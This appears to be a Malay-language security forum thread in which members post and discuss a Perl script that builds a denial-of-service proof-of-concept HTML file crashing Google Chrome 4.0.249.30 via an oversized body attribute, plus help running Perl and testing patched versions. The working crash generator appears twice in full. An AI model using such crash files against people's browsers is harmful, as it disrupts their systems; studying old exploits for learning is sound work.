security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

johnburn, aku da brjaye install activeperl tu,
tp mcm mane nk runkn scrip ni kt perl packet manager?

$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";




@hampeh
sharing is caring, huhu

exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe

hampeh wrote:exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe

seriously, aku x tau sape ko.. hahaha

seriously, aku x tau sape ko.. hahaha

lagi bagus.. wahahaha , good luck diucapkan untuk kita2 yang kena buat kerja exploit nih. haha

ahfat797 wrote:johnburn, aku da brjaye install activeperl tu,
tp mcm mane nk runkn scrip ni kt perl packet manager?

$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";

just savekn code tu sebagai apeapenama.pl then bukak command prompt, cd ke directory yg ko save file tu td, then type blk nama file tu pas dh cd (cnth:apeapenama.pl) dan tkan enter. spatutnya script tu akan run sbb time instal activeperl tu, die ptt dh setkn file association untuk .pl

hampeh wrote:exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe

pilih exploit yg ko rase yakin nk explain la. byk kje skit pn xpe

style bro, aku da brjaya..
thx bro johnburn..
best gak security ni.. aha.,

ahfat797 wrote:style bro, aku da brjaya..
thx bro johnburn..
best gak security ni.. aha.,

so prepare la keterangan sbb ape jd cmtu

lg satu, tunjuk comparison antara chrome yg vulnerable ngan yg dh patch

[quote="johnburn"]

ahfat797 wrote:tunjuk comparison antara chrome yg vulnerable ngan yg dh patch

xfham mksd bro?
ape bezanya?

ahfat797 wrote:
xfham mksd bro?
ape bezanya?

mksd aku, try kt chrome yg latest. spttnye die dh xcrash dan akan redirect ke page google kl bukak file poc.html tu. aku test kt chromium 5.0.308.0, xcrash dh dan die redirect pergi ke site google. chrome dibina berasaskn code chromium, so mngkn kt version chrome yg latest pn dh x crash dh.

owh... faham2...
btw, ape fungsi activeperl tu?
kenape lalalala.pl , .pl tu ape sebenarnye?
script yg die bg tu bole diedit?

perl merupakan interpreted programing langguage, mcm phyton, ruby, php etc.
mksdnye dia perlukan interpreter untuk run. so activeperl kira die pnye interpreter la. mcm kl kita nk run file php gak, kite perlu install php

.pl tu merupakan extension untuk file perl. sama cam .bat untuk file batch, .cpp untuk file c++, .txt untuk file text. tu extension supaya sistem kenal tu file apa dan tau apa nk buat dgn file tersebut (program apa yg perlu dipakai untuk run file tersebut). File association dlm registry akan menghubungkan file extension dgn program ape yg akan digunakan untuk menjalankan file tersebut. dlm kes ni file .pl akan dijalankan oleh perl (interpreter).

sama mcm mne2 programing language len, ko bleh buat mcm2 dn pkai perl ni. so bkn stakat nk ubah code tu, tp ko bleh buat len2 bnda lg kl tau

owh..
thank you bro..

oo btw, jgn confuse. perl script tu bkn exploit. die just pkai perl script untuk hasilkan file exploit tu (poc.html) sbb kl nk type manually a/ sampai 10000000 kali rasenye sgt ssh hehe

aku da try kt chrome 5.0.307.1 beta
result still same.. crash

err ye ke? xtau haha. aku x test kt chrome sbb xde, tp kat chromium 5.0.308.0
spttnye xde beza sgt sbb chrome dibina berasaskan code chromium. cuba try ngan latest stable version, jgn yg beta

5.0.307.1
result pun same gak.. haha

haha mungkin kne tggu version 5.0.308.0, same ngan version chromium aku

Jadi jugak exploit aku buat, rupanya memang kena pakai win xp sp3 .

Sori la aku out of topic jap

Nape Google Chrome cepat sangat kuarkan version baru yer?
Version 4 hari tu pun still dalam Beta tp skrg dh kuar version 5
Tgk pada Change Log xder la major improvement sgt kat version 5 ni
Ada sape2 leh jawab?

mungkin critical bugfix kot tapi dia rahsiakan ataupun ni yang dipanggil nightly build saja kasi orang rasa in development punya software.

hampeh wrote:mungkin critical bugfix kot tapi dia rahsiakan ataupun ni yang dipanggil nightly build saja kasi orang rasa in development punya software.

Kira mcm ala2 gimik jer la yer?

tak jugak , lebih kepada kasi merasa(rasa bug la haha,tapi aku dulu pakai firefox nightly build ni ok je skali sekala je problem) .. user pun boleh gak bagi pendapat apa function yang ada bug @ dibuang tapi user still nak. Macam firefox 3.6 ni boleh pulak dia buang function untuk tengok properties image .. nasib baik ada plugin .. huhu